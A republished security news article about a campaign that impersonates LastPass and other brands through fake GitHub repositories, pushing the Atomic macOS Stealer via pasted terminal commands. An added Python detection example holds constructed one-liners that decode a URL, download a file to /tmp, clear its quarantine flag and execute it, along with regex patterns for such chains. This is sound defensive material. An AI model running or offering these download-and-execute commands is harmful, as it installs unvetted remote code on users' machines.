Widespread Infostealer Campaign Targeting macOS Users
Threat actors are impersonating known brands in an ongoing, widespread campaign aimed at infecting macOS users with information stealer malware, LastPass warns.
As part of the infection chain, the hackers are relying on fraudulent GitHub repositories claiming to provide macOS software from various companies and use search engine optimization (SEO) so that links to the repositories appear at the top of search pages.
“In the case of LastPass, the fraudulent repositories redirected potential victims to a repository that downloads the Atomic infostealer malware,” LastPass says.
LastPass identified two GitHub sites impersonating its brand, which were posted on the Microsoft-owned code-sharing platform on 16 September, and which have been taken down since.
Both were posted by a user named ‘modhopmduck476’ and contained links claiming to enable users to install ‘LastPass on MacBook’, but redirected to the same malicious page.
A page claiming to offer ‘LastPass Premium on MacBook’ redirected to macprograms-pro[.]com, where users were instructed to copy and paste a command into a terminal window.
The command initiates a curl request to an encoded URL, which downloads an ‘Update’ payload into the temporary directory.
The payload was the Atomic macOS Stealer (AMOS) infostealer, which has been used in numerous attacks since 2023. In August, CrowdStrike warned of an increase in fraudulent advertisements delivering a variant of AMOS called SHAMOS.
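As an added illustration of the terminal copy-paste step described above (example code written for this page, not part of the original article), the following Python triage function flags recorded shell commands that pair a download tool with either an encoded argument or a download-then-execute-from-a-temp-directory chain. The sample command lines and the reserved example.invalid domain are constructed; the indicator names are this example's own.

```python
import base64
import re

# Constructed sample command lines, as a shell-history or EDR process
# collector might record them. None are from the article or a real incident.
_ENCODED = base64.b64encode(b"https://example.invalid/Update").decode()
SAMPLE_COMMANDS = [
    "ls -la ~/Downloads",
    f"echo {_ENCODED} | base64 -d | xargs curl -s -o /tmp/Update"
    " && chmod +x /tmp/Update && /tmp/Update",
    "brew install --cask firefox",
    "curl -fsSL https://example.invalid/Update -o /tmp/Update;"
    " xattr -c /tmp/Update; /tmp/Update",
    "curl -s https://example.invalid/api/status",
]

# Coarse indicators over the whole command line; the goal is triage of
# copy-pasted one-liners, not exact signature matching.
_TEMP = r"(/tmp|/private/tmp|\$TMPDIR|/var/folders)"
INDICATORS = {
    "download_tool": re.compile(r"\b(curl|wget)\b"),
    "base64_decode": re.compile(r"base64\s+(-d|--decode|-D)\b"),
    "long_b64_token": re.compile(r"\b[A-Za-z0-9+/]{24,}={0,2}\b"),
    "write_to_temp": re.compile(r"(-o|-O|>)\s*[\"']?" + _TEMP),
    "exec_from_temp": re.compile(r"(chmod\s+\+x|xattr\s+-c|[;&|]\s*)\s*" + _TEMP),
}


def indicators_for(cmd):
    """Return the sorted names of all indicators present in one command."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(cmd))


def is_suspicious(cmd):
    """A download tool alone is normal; require an encoded argument or a
    drop-to-temp-and-run chain alongside it before flagging."""
    hits = set(indicators_for(cmd))
    encoded = {"base64_decode", "long_b64_token"} & hits
    drop_and_run = {"write_to_temp", "exec_from_temp"} <= hits
    return "download_tool" in hits and (bool(encoded) or drop_and_run)


def triage(commands):
    """Filter a list of recorded commands down to the ones worth a look."""
    return [c for c in commands if is_suspicious(c)]
```

Running `triage(SAMPLE_COMMANDS)` returns only the two download-and-run one-liners; the plain `curl` status check and the Homebrew install are left alone.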
LastPass has observed the threat actors impersonating financial institutions, password managers, technology companies, AI tools, cryptocurrency wallets, and other businesses.
To evade detection, the threat actors used multiple GitHub usernames to create other fake GitHub pages, which followed a similar naming pattern combining the name of the targeted company with Mac-related terminology.
The campaign observed by LastPass has been ongoing since at least July, when Deriv security researcher Dhiraj Mishra warned that Homebrew users were targeted with malicious ads leading to a fake GitHub repository.
The attacks, Mishra pointed out, exploited users’ trust in Google Ads and GitHub, and installed the official Homebrew application to hide the execution of a malicious payload in the background.
This article was originally published by Security Week. Please check their website for the original content.